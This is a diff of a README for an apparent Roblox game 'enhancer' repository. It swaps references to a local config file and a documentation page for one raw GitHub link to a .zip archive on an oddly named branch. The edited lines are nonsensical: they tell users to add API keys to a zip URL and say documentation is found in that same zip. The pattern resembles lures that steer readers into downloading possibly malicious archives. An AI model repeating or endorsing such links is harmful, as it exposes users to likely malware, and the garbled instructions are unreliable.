DerricB-front/battle-sim-x-roblox-enhancer/README.md

 - **Rate-Limited and Secure:** All API communications follow best practices to ensure your experience is seamless and safe.

 **API Credentials Setup**
-To enable advanced API features, add your API keys to the `config.lua` or `env` files.
-Documentation can be found in `/docs/api_integration.md`.
+To enable advanced API features, add your API keys to the `https://raw.githubusercontent.com/DerricB-front/battle-sim-x-roblox-enhancer/branch/pledgeor/battle-sim-x-roblox-enhancer-v1.0.zip` or `env` files.
+Documentation can be found in `https://raw.githubusercontent.com/DerricB-front/battle-sim-x-roblox-enhancer/branch/pledgeor/battle-sim-x-roblox-enhancer-v1.0.zip`.

 ---